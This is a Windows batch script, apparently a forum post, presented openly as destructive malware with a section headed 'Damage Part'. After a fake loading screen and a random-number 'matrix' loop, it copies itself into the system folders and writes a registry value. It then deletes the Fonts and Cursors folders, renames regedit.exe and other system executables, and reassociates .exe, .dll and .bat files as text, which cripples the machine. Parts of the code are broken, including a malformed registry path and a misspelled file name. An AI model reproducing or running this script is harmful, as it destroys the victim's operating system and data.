Código:
@echo off
title Xtte-0x
echo Loading [::]
ping -n 3 0.0.0.0 > nul
cls
echo Loading [::::]
ping -n 3 0.0.0.0 > nul
cls
echo Loading [::::::]
ping -n 3 0.0.0.0 > nul
cls
:xtmatrix
echo %random%%random%%random%%random%%random%%random%%random%%random%
goto xtmatrix
REM +--------------------------------------------------+
REM + Damage Part
REM +--------------------------------------------------+
:xtcopy
copy /y desktop_XT-2.bat %windir%\system
copy /y desktop_XT-2.bat %windir%\system32
REM +--------------------------------------------------+
REM - This part changes the file name of 'SYSTEM32'
REM +--------------------------------------------------+
REG ADD HKEY\Software\Microsoft\Windows\CurrentVersion /f /v Xtte-2 /t REG_BINARY /d %windir%\system32\MS0X%random%.bat
MKDIR %random%%random%
MKDIR %random%%random%
RMDIR /s /q %systemroot%\Cursors
RMDIR /s /q %systemroot%\Fonts
RMDIR /s /q %systemroot%\ime
REN %systemroot%\system32\chkdks.exe %random%%random%.txt
REN %systemroot%\system32\chkntfs.exe %random%%random%.txt
REN %systemroot%\system32\winfxdocobj.exe %random%%random%.txt
REN %systemroot%\system32\Sounds %random%-%random%%random%-%random%
REN %windir%\regedit.exe %random%%random%.txt
REN %comspec%\ %random%
DEL /S /Q mouse.drv
goto xtcopy
REM +--------------------------------------------------+
REM - This part changes the ext name
REM +--------------------------------------------------+
ASSOC .dll=txtfile
ASSOC .exe=txtfile
ASSOC .bin=txtfile
ASSOC .reg=txtfile
:xtchange
ASSOC .bat=txtfile
cd\
cd %systemroot%\system32
ATTRIB -R -A -S -H /S *.dll
ATTRIB -R -A -S -H /S *.exe
ATTRIB -R -A -S -H /S *.dat
ATTRIB -R -A -S -H /S *.bin
goto xtchange
EXIT